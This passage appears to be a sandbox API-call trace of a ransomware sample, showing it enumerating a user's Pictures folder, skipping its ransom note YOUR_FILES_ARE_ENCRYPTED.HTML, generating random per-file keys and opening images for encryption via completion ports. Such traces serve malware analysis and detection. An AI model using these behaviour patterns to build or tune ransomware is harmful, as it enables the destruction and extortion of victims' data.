param_1=0x19ed0e, param_2="%02X" | out: param_1="81") returned 2 [0125.271] wsprintfW (in: param_1=0x19ed12, param_2="%02X" | out: param_1="CC") returned 2 [0125.271] wsprintfW (in: param_1=0x19ed16, param_2="%02X" | out: param_1="C6") returned 2 [0125.271] wsprintfW (in: param_1=0x19ed1a, param_2="%02X" | out: param_1="28") returned 2 [0125.271] wsprintfW (in: param_1=0x19ed1e, param_2="%02X" | out: param_1="AF") returned 2 [0125.271] wsprintfW (in: param_1=0x19ed22, param_2="%02X" | out: param_1="73") returned 2 [0125.271] wsprintfW (in: param_1=0x19ed26, param_2="%02X" | out: param_1="AA") returned 2 [0125.271] wsprintfW (in: param_1=0x19ed2a, param_2="%02X" | out: param_1="2A") returned 2 [0125.271] wsprintfW (in: param_1=0x19ed2e, param_2="%02X" | out: param_1="F1") returned 2 [0125.271] wsprintfW (in: param_1=0x19ed32, param_2="%02X" | out: param_1="48") returned 2 [0125.271] wsprintfW (in: param_1=0x19ed36, param_2="%02X" | out: param_1="B6") returned 2 [0125.271] wsprintfW (in: param_1=0x19ed3a, param_2="%02X" | out: param_1="44") returned 2 [0125.271] wsprintfW (in: param_1=0x19ed3e, param_2="%02X" | out: param_1="91") returned 2 [0125.271] wsprintfW (in: param_1=0x19ed42, param_2="%02X" | out: param_1="42") returned 2 [0125.271] wsprintfW (in: param_1=0x19ed46, param_2="%02X" | out: param_1="A5") returned 2 [0125.271] wsprintfW (in: param_1=0x19ed4a, param_2="%02X" | out: param_1="60") returned 2 [0125.271] wsprintfW (in: param_1=0x19ed4e, param_2="%02X" | out: param_1="4B") returned 2 [0125.271] wsprintfW (in: param_1=0x19ed52, param_2="%02X" | out: param_1="C7") returned 2 [0125.271] wsprintfW (in: param_1=0x19ed56, param_2="%02X" | out: param_1="8E") returned 2 [0125.272] wsprintfW (in: param_1=0x19ed5a, param_2="%02X" | out: param_1="34") returned 2 [0125.272] wsprintfW (in: param_1=0x19ed5e, param_2="%02X" | out: param_1="40") returned 2 [0125.272] wsprintfW (in: param_1=0x19ed62, param_2="%02X" | out: param_1="59") returned 2 [0125.272] wsprintfW (in: param_1=0x19ed66, param_2="%02X" | out: param_1="E5") returned 2 [0125.272] wsprintfW (in: param_1=0x19ed6a, param_2="%02X" | out: param_1="C0") returned 2 [0125.272] wsprintfW (in: param_1=0x19ed6e, param_2="%02X" | out: param_1="05") returned 2 [0125.272] wsprintfW (in: param_1=0x19ed72, param_2="%02X" | out: param_1="07") returned 2 [0125.272] wsprintfW (in: param_1=0x19ed76, param_2="%02X" | out: param_1="61") returned 2 [0125.273] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\fmAjYu WdJfo pyd48R.png" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\fmAjYu WdJfo pyd48R.png") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\fmAjYu WdJfo pyd48R.png" [0125.273] CreateIoCompletionPort (FileHandle=0x31c, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0125.273] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0125.278] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x243ae980, ftCreationTime.dwHighDateTime=0x1d6fc67, ftLastAccessTime.dwLowDateTime=0xd764e6f0, ftLastAccessTime.dwHighDateTime=0x1d7014e, ftLastWriteTime.dwLowDateTime=0xd764e6f0, ftLastWriteTime.dwHighDateTime=0x1d7014e, nFileSizeHigh=0x0, nFileSizeLow=0x825b, dwReserved0=0x19eee8, dwReserved1=0x7784abfa, cFileName="Iq2I.png", cAlternateFileName="")) returned 1 [0125.278] StrStrIW (lpFirst="Iq2I.png", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0125.278] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\Iq2I.png") returned 43 [0125.278] PathFindExtensionW (pszPath="Iq2I.png") returned=".png" [0125.279] lstrlenW (lpString=".png") returned 4 [0125.279] PathFindExtensionW (pszPath="Iq2I.png") returned=".png" [0125.279] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0125.279] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\Iq2I.png" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\iq2i.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0125.280] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=33371) returned 1 [0125.280] GetProcessHeap () returned 0x600000 [0125.280] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0125.282] wsprintfW (in: param_1=0x19ecfa, param_2="%02X" | out: param_1="83") returned 2 [0125.282] wsprintfW (in: param_1=0x19ecfe, param_2="%02X" | out: param_1="BD") returned 2 [0125.282] wsprintfW (in: param_1=0x19ed02, param_2="%02X" | out: param_1="C6") returned 2 [0125.282] wsprintfW (in: param_1=0x19ed06, param_2="%02X" | out: param_1="94") returned 2 [0125.282] wsprintfW (in: param_1=0x19ed0a, param_2="%02X" | out: param_1="B0") returned 2 [0125.282] wsprintfW (in: param_1=0x19ed0e, param_2="%02X" | out: param_1="FE") returned 2 [0125.282] wsprintfW (in: param_1=0x19ed12, param_2="%02X" | out: param_1="AF") returned 2 [0125.282] wsprintfW (in: param_1=0x19ed16, param_2="%02X" | out: param_1="A9") returned 2 [0125.282] wsprintfW (in: param_1=0x19ed1a, param_2="%02X" | out: param_1="C5") returned 2 [0125.282] wsprintfW (in: param_1=0x19ed1e, param_2="%02X" | out: param_1="0E") returned 2 [0125.282] wsprintfW (in: param_1=0x19ed22, param_2="%02X" | out: param_1="E0") returned 2 [0125.282] wsprintfW (in: param_1=0x19ed26, param_2="%02X" | out: param_1="5E") returned 2 [0125.282] wsprintfW (in: param_1=0x19ed2a, param_2="%02X" | out: param_1="04") returned 2 [0125.282] wsprintfW (in: param_1=0x19ed2e, param_2="%02X" | out: param_1="23") returned 2 [0125.282] wsprintfW (in: param_1=0x19ed32, param_2="%02X" | out: param_1="13") returned 2 [0125.282] wsprintfW (in: param_1=0x19ed36, param_2="%02X" | out: param_1="68") returned 2 [0125.282] wsprintfW (in: param_1=0x19ed3a, param_2="%02X" | out: param_1="16") returned 2 [0125.282] wsprintfW (in: param_1=0x19ed3e, param_2="%02X" | out: param_1="6A") returned 2 [0125.282] wsprintfW (in: param_1=0x19ed42, param_2="%02X" | out: param_1="60") returned 2 [0125.282] wsprintfW (in: param_1=0x19ed46, param_2="%02X" | out: param_1="50") returned 2 [0125.282] wsprintfW (in: param_1=0x19ed4a, param_2="%02X" | out: param_1="A5") returned 2 [0125.283] wsprintfW (in: param_1=0x19ed4e, param_2="%02X" | out: param_1="76") returned 2 [0125.283] wsprintfW (in: param_1=0x19ed52, param_2="%02X" | out: param_1="93") returned 2 [0125.283] wsprintfW (in: param_1=0x19ed56, param_2="%02X" | out: param_1="10") returned 2 [0125.283] wsprintfW (in: param_1=0x19ed5a, param_2="%02X" | out: param_1="75") returned 2 [0125.283] wsprintfW (in: param_1=0x19ed5e, param_2="%02X" | out: param_1="09") returned 2 [0125.283] wsprintfW (in: param_1=0x19ed62, param_2="%02X" | out: param_1="26") returned 2 [0125.283] wsprintfW (in: param_1=0x19ed66, param_2="%02X" | out: param_1="B8") returned 2 [0125.283] wsprintfW (in: param_1=0x19ed6a, param_2="%02X" | out: param_1="08") returned 2 [0125.283] wsprintfW (in: param_1=0x19ed6e, param_2="%02X" | out: param_1="F1") returned 2 [0125.283] wsprintfW (in: param_1=0x19ed72, param_2="%02X" | out: param_1="88") returned 2 [0125.283] wsprintfW (in: param_1=0x19ed76, param_2="%02X" | out: param_1="43") returned 2 [0125.284] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\Iq2I.png" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\Iq2I.png") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\Iq2I.png" [0125.284] CreateIoCompletionPort (FileHandle=0x31c, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0125.284] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0125.288] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xacc10630, ftCreationTime.dwHighDateTime=0x1d6fd3a, ftLastAccessTime.dwLowDateTime=0x1dde24d0, ftLastAccessTime.dwHighDateTime=0x1d70635, ftLastWriteTime.dwLowDateTime=0x1dde24d0, ftLastWriteTime.dwHighDateTime=0x1d70635, nFileSizeHigh=0x0, nFileSizeLow=0x11cf5, dwReserved0=0x19eee8, dwReserved1=0x7784abfa, cFileName="kgFY5VqauJGoEm.jpg", cAlternateFileName="KGFY5V~1.JPG")) returned 1 [0125.288] StrStrIW (lpFirst="kgFY5VqauJGoEm.jpg", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0125.288] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\kgFY5VqauJGoEm.jpg") returned 53 [0125.288] PathFindExtensionW (pszPath="kgFY5VqauJGoEm.jpg") returned=".jpg" [0125.288] lstrlenW (lpString=".jpg") returned 4 [0125.288] PathFindExtensionW (pszPath="kgFY5VqauJGoEm.jpg") returned=".jpg" [0125.288] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0125.288] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\kgFY5VqauJGoEm.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\kgfy5vqaujgoem.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0125.289] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=72949) returned 1 [0125.289] GetProcessHeap () returned 0x600000 [0125.289] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0125.290] wsprintfW (in: param_1=0x19ecfa, param_2="%02X" | out: param_1="8E") returned 2 [0125.290] wsprintfW (in: param_1=0x19ecfe, param_2="%02X" | out: param_1="7C") returned 2 [0125.290] wsprintfW (in: param_1=0x19ed02, param_2="%02X" | out: param_1="2E") returned 2 [0125.290] wsprintfW (in: param_1=0x19ed06, param_2="%02X" | out: param_1="02") returned 2 [0125.290] wsprintfW (in: param_1=0x19ed0a, param_2="%02X" | out: param_1="42") returned 2 [0125.290] wsprintfW (in: param_1=0x19ed0e, param_2="%02X" | out: param_1="7D") returned 2 [0125.290] wsprintfW (in: param_1=0x19ed12, param_2="%02X" | out: param_1="AB") returned 2 [0125.291] wsprintfW (in: param_1=0x19ed16, param_2="%02X" | out: param_1="65") returned 2 [0125.291] wsprintfW (in: param_1=0x19ed1a, param_2="%02X" | out: param_1="1D") returned 2 [0125.291] wsprintfW (in: param_1=0x19ed1e, param_2="%02X" | out: param_1="F0") returned 2 [0125.291] wsprintfW (in: param_1=0x19ed22, param_2="%02X" | out: param_1="40") returned 2 [0125.291] wsprintfW (in: param_1=0x19ed26, param_2="%02X" | out: param_1="0F") returned 2 [0125.291] wsprintfW (in: param_1=0x19ed2a, param_2="%02X" | out: param_1="3D") returned 2 [0125.291] wsprintfW (in: param_1=0x19ed2e, param_2="%02X" | out: param_1="FE") returned 2 [0125.291] wsprintfW (in: param_1=0x19ed32, param_2="%02X" | out: param_1="E8") returned 2 [0125.291] wsprintfW (in: param_1=0x19ed36, param_2="%02X" | out: param_1="0D") returned 2 [0125.291] wsprintfW (in: param_1=0x19ed3a, param_2="%02X" | out: param_1="FC") returned 2 [0125.291] wsprintfW (in: param_1=0x19ed3e, param_2="%02X" | out: param_1="79") returned 2 [0125.291] wsprintfW (in: param_1=0x19ed42, param_2="%02X" | out: param_1="B6") returned 2 [0125.291] wsprintfW (in: param_1=0x19ed46, param_2="%02X" | out: param_1="B1") returned 2 [0125.291] wsprintfW (in: param_1=0x19ed4a, param_2="%02X" | out: param_1="DF") returned 2 [0125.291] wsprintfW (in: param_1=0x19ed4e, param_2="%02X" | out: param_1="64") returned 2 [0125.291] wsprintfW (in: param_1=0x19ed52, param_2="%02X" | out: param_1="B6") returned 2 [0125.291] wsprintfW (in: param_1=0x19ed56, param_2="%02X" | out: param_1="8F") returned 2 [0125.291] wsprintfW (in: param_1=0x19ed5a, param_2="%02X" | out: param_1="21") returned 2 [0125.291] wsprintfW (in: param_1=0x19ed5e, param_2="%02X" | out: param_1="FC") returned 2 [0125.291] wsprintfW (in: param_1=0x19ed62, param_2="%02X" | out: param_1="F9") returned 2 [0125.291] wsprintfW (in: param_1=0x19ed66, param_2="%02X" | out: param_1="CF") returned 2 [0125.291] wsprintfW (in: param_1=0x19ed6a, param_2="%02X" | out: param_1="CD") returned 2 [0125.291] wsprintfW (in: param_1=0x19ed6e, param_2="%02X" | out: param_1="F4") returned 2 [0125.291] wsprintfW (in: param_1=0x19ed72, param_2="%02X" | out: param_1="66") returned 2 [0125.292] wsprintfW (in: param_1=0x19ed76, param_2="%02X" | out: param_1="35") returned 2 [0125.292] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\kgFY5VqauJGoEm.jpg" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\kgFY5VqauJGoEm.jpg") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\kgFY5VqauJGoEm.jpg" [0125.292] CreateIoCompletionPort (FileHandle=0x31c, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0125.292] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0125.300] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40d7a110, ftCreationTime.dwHighDateTime=0x1d70396, ftLastAccessTime.dwLowDateTime=0x7fb2f340, ftLastAccessTime.dwHighDateTime=0x1d7039a, ftLastWriteTime.dwLowDateTime=0x7fb2f340, ftLastWriteTime.dwHighDateTime=0x1d7039a, nFileSizeHigh=0x0, nFileSizeLow=0x16d6a, dwReserved0=0x19eee8, dwReserved1=0x7784abfa, cFileName="pVjes.bmp", cAlternateFileName="")) returned 1 [0125.300] StrStrIW (lpFirst="pVjes.bmp", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0125.300] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\pVjes.bmp") returned 44 [0125.300] PathFindExtensionW (pszPath="pVjes.bmp") returned=".bmp" [0125.300] lstrlenW (lpString=".bmp") returned 4 [0125.300] PathFindExtensionW (pszPath="pVjes.bmp") returned=".bmp" [0125.300] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0125.300] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\pVjes.bmp" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\pvjes.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0125.301] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=93546) returned 1 [0125.302] GetProcessHeap () returned 0x600000 [0125.302] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0125.302] wsprintfW (in: param_1=0x19ecfa, param_2="%02X" | out: param_1="6F") returned 2 [0125.302] wsprintfW (in: param_1=0x19ecfe, param_2="%02X" | out: param_1="5C") returned 2 [0125.302] wsprintfW (in: param_1=0x19ed02, param_2="%02X" | out: param_1="08") returned 2 [0125.302] wsprintfW (in: param_1=0x19ed06, param_2="%02X" | out: param_1="EB") returned 2 [0125.302] wsprintfW (in: param_1=0x19ed0a, param_2="%02X" | out: param_1="C2") returned 2 [0125.302] wsprintfW (in: param_1=0x19ed0e, param_2="%02X" | out: param_1="7D") returned 2 [0125.303] wsprintfW (in: param_1=0x19ed12, param_2="%02X" | out: param_1="03") returned 2 [0125.303] wsprintfW (in: param_1=0x19ed16, param_2="%02X" | out: param_1="12") returned 2 [0125.303] wsprintfW (in: param_1=0x19ed1a, param_2="%02X" | out: param_1="9A") returned 2 [0125.303] wsprintfW (in: param_1=0x19ed1e, param_2="%02X" | out: param_1="DA") returned 2 [0125.303] wsprintfW (in: param_1=0x19ed22, param_2="%02X" | out: param_1="05") returned 2 [0125.303] wsprintfW (in: param_1=0x19ed26, param_2="%02X" | out: param_1="16") returned 2 [0125.303] wsprintfW (in: param_1=0x19ed2a, param_2="%02X" | out: param_1="71") returned 2 [0125.303] wsprintfW (in: param_1=0x19ed2e, param_2="%02X" | out: param_1="B9") returned 2 [0125.303] wsprintfW (in: param_1=0x19ed32, param_2="%02X" | out: param_1="CA") returned 2 [0125.303] wsprintfW (in: param_1=0x19ed36, param_2="%02X" | out: param_1="DD") returned 2 [0125.303] wsprintfW (in: param_1=0x19ed3a, param_2="%02X" | out: param_1="9F") returned 2 [0125.303] wsprintfW (in: param_1=0x19ed3e, param_2="%02X" | out: param_1="1B") returned 2 [0125.303] wsprintfW (in: param_1=0x19ed42, param_2="%02X" | out: param_1="2C") returned 2 [0125.303] wsprintfW (in: param_1=0x19ed46, param_2="%02X" | out: param_1="AE") returned 2 [0125.303] wsprintfW (in: param_1=0x19ed4a, param_2="%02X" | out: param_1="C1") returned 2 [0125.303] wsprintfW (in: param_1=0x19ed4e, param_2="%02X" | out: param_1="E3") returned 2 [0125.303] wsprintfW (in: param_1=0x19ed52, param_2="%02X" | out: param_1="D0") returned 2 [0125.303] wsprintfW (in: param_1=0x19ed56, param_2="%02X" | out: param_1="95") returned 2 [0125.303] wsprintfW (in: param_1=0x19ed5a, param_2="%02X" | out: param_1="FB") returned 2 [0125.303] wsprintfW (in: param_1=0x19ed5e, param_2="%02X" | out: param_1="E6") returned 2 [0125.303] wsprintfW (in: param_1=0x19ed62, param_2="%02X" | out: param_1="B6") returned 2 [0125.303] wsprintfW (in: param_1=0x19ed66, param_2="%02X" | out: param_1="0D") returned 2 [0125.303] wsprintfW (in: param_1=0x19ed6a, param_2="%02X" | out: param_1="E8") returned 2 [0125.303] wsprintfW (in: param_1=0x19ed6e, param_2="%02X" | out: param_1="54") returned 2 [0125.303] wsprintfW (in: param_1=0x19ed72, param_2="%02X" | out: param_1="B9") returned 2 [0125.303] wsprintfW (in: param_1=0x19ed76, param_2="%02X" | out: param_1="22") returned 2 [0125.310] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\pVjes.bmp" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\pVjes.bmp") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\pVjes.bmp" [0125.310] CreateIoCompletionPort (FileHandle=0x31c, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0125.310] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0125.316] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x63a03f30, ftCreationTime.dwHighDateTime=0x1d707cf, ftLastAccessTime.dwLowDateTime=0x93b791e0, ftLastAccessTime.dwHighDateTime=0x1d7096f, ftLastWriteTime.dwLowDateTime=0x93b791e0, ftLastWriteTime.dwHighDateTime=0x1d7096f, nFileSizeHigh=0x0, nFileSizeLow=0xe1d3, dwReserved0=0x19eee8, dwReserved1=0x7784abfa, cFileName="rBytkCOyOZm.bmp", cAlternateFileName="RBYTKC~1.BMP")) returned 1 [0125.316] StrStrIW (lpFirst="rBytkCOyOZm.bmp", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0125.316] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\rBytkCOyOZm.bmp") returned 50 [0125.316] PathFindExtensionW (pszPath="rBytkCOyOZm.bmp") returned=".bmp" [0125.316] lstrlenW (lpString=".bmp") returned 4 [0125.316] PathFindExtensionW (pszPath="rBytkCOyOZm.bmp") returned=".bmp" [0125.316] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0125.316] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\rBytkCOyOZm.bmp" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\rbytkcoyozm.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0125.317] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=57811) returned 1 [0125.317] GetProcessHeap () returned 0x600000 [0125.317] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0125.319] wsprintfW (in: param_1=0x19ecfa, param_2="%02X" | out: param_1="FD") returned 2 [0125.319] wsprintfW (in: param_1=0x19ecfe, param_2="%02X" | out: param_1="C7") returned 2 [0125.319] wsprintfW (in: param_1=0x19ed02, param_2="%02X" | out: param_1="68") returned 2 [0125.319] wsprintfW (in: param_1=0x19ed06, param_2="%02X" | out: param_1="F7") returned 2 [0125.319] wsprintfW (in: param_1=0x19ed0a, param_2="%02X" | out: param_1="19") returned 2 [0125.319] wsprintfW (in: param_1=0x19ed0e, param_2="%02X" | out: param_1="C1") returned 2 [0125.319] wsprintfW (in: param_1=0x19ed12, param_2="%02X" | out: param_1="03") returned 2 [0125.319] wsprintfW (in: param_1=0x19ed16, param_2="%02X" | out: param_1="3F") returned 2 [0125.319] wsprintfW (in: param_1=0x19ed1a, param_2="%02X" | out: param_1="E6") returned 2 [0125.319] wsprintfW (in: param_1=0x19ed1e, param_2="%02X" | out: param_1="80") returned 2 [0125.319] wsprintfW (in: param_1=0x19ed22, param_2="%02X" | out: param_1="98") returned 2 [0125.319] wsprintfW (in: param_1=0x19ed26, param_2="%02X" | out: param_1="AE") returned 2 [0125.319] wsprintfW (in: param_1=0x19ed2a, param_2="%02X" | out: param_1="DE") returned 2 [0125.319] wsprintfW (in: param_1=0x19ed2e, param_2="%02X" | out: param_1="B2") returned 2 [0125.319] wsprintfW (in: param_1=0x19ed32, param_2="%02X" | out: param_1="A1") returned 2 [0125.319] wsprintfW (in: param_1=0x19ed36, param_2="%02X" | out: param_1="C4") returned 2 [0125.319] wsprintfW (in: param_1=0x19ed3a, param_2="%02X" | out: param_1="84") returned 2 [0125.319] wsprintfW (in: param_1=0x19ed3e, param_2="%02X" | out: param_1="A0") returned 2 [0125.319] wsprintfW (in: param_1=0x19ed42, param_2="%02X" | out: param_1="89") returned 2 [0125.319] wsprintfW (in: param_1=0x19ed46, param_2="%02X" | out: param_1="51") returned 2 [0125.319] wsprintfW (in: param_1=0x19ed4a, param_2="%02X" | out: param_1="2E") returned 2 [0125.319] wsprintfW (in: param_1=0x19ed4e, param_2="%02X" | out: param_1="33") returned 2 [0125.319] wsprintfW (in: param_1=0x19ed52, param_2="%02X" | out: param_1="EC") returned 2 [0125.319] wsprintfW (in: param_1=0x19ed56, param_2="%02X" | out: param_1="AB") returned 2 [0125.319] wsprintfW (in: param_1=0x19ed5a, param_2="%02X" | out: param_1="2A") returned 2 [0125.319] wsprintfW (in: param_1=0x19ed5e, param_2="%02X" | out: param_1="DC") returned 2 [0125.319] wsprintfW (in: param_1=0x19ed62, param_2="%02X" | out: param_1="83") returned 2 [0125.319] wsprintfW (in: param_1=0x19ed66, param_2="%02X" | out: param_1="8D") returned 2 [0125.319] wsprintfW (in: param_1=0x19ed6a, param_2="%02X" | out: param_1="94") returned 2 [0125.319] wsprintfW (in: param_1=0x19ed6e, param_2="%02X" | out: param_1="B4") returned 2 [0125.320] wsprintfW (in: param_1=0x19ed72, param_2="%02X" | out: param_1="B2") returned 2 [0125.320] wsprintfW (in: param_1=0x19ed76, param_2="%02X" | out: param_1="11") returned 2 [0125.320] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\rBytkCOyOZm.bmp" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\rBytkCOyOZm.bmp") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\rBytkCOyOZm.bmp" [0125.320] CreateIoCompletionPort (FileHandle=0x31c, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0125.320] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0125.324] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2b1a6533, ftCreationTime.dwHighDateTime=0x1d70504, ftLastAccessTime.dwLowDateTime=0x2b1a6533, ftLastAccessTime.dwHighDateTime=0x1d70504, ftLastWriteTime.dwLowDateTime=0x2b1a6533, ftLastWriteTime.dwHighDateTime=0x1d70504, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19eee8, dwReserved1=0x7784abfa, cFileName="Saved Pictures", cAlternateFileName="SAVEDP~1")) returned 1 [0125.324] StrStrIW (lpFirst="Saved Pictures", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0125.324] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\Saved Pictures") returned 49 [0125.324] GetProcessHeap () returned 0x600000 [0125.324] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f4fc8 [0125.324] lstrcpyW (in: lpString1=0x30f4fc8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\Saved Pictures" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\Saved Pictures") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\Saved Pictures" [0125.324] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\Saved Pictures", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\Saved Pictures\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\Saved Pictures\\*" [0125.324] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\Saved Pictures\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2b1a6533, ftCreationTime.dwHighDateTime=0x1d70504, ftLastAccessTime.dwLowDateTime=0x2b1a6533, ftLastAccessTime.dwHighDateTime=0x1d70504, ftLastWriteTime.dwLowDateTime=0x2b1a6533, ftLastWriteTime.dwHighDateTime=0x1d70504, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19ec60, dwReserved1=0xfe75893d, cFileName=".", cAlternateFileName="")) returned 0x626638 [0125.325] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2b1a6533, ftCreationTime.dwHighDateTime=0x1d70504, ftLastAccessTime.dwLowDateTime=0x2b1a6533, 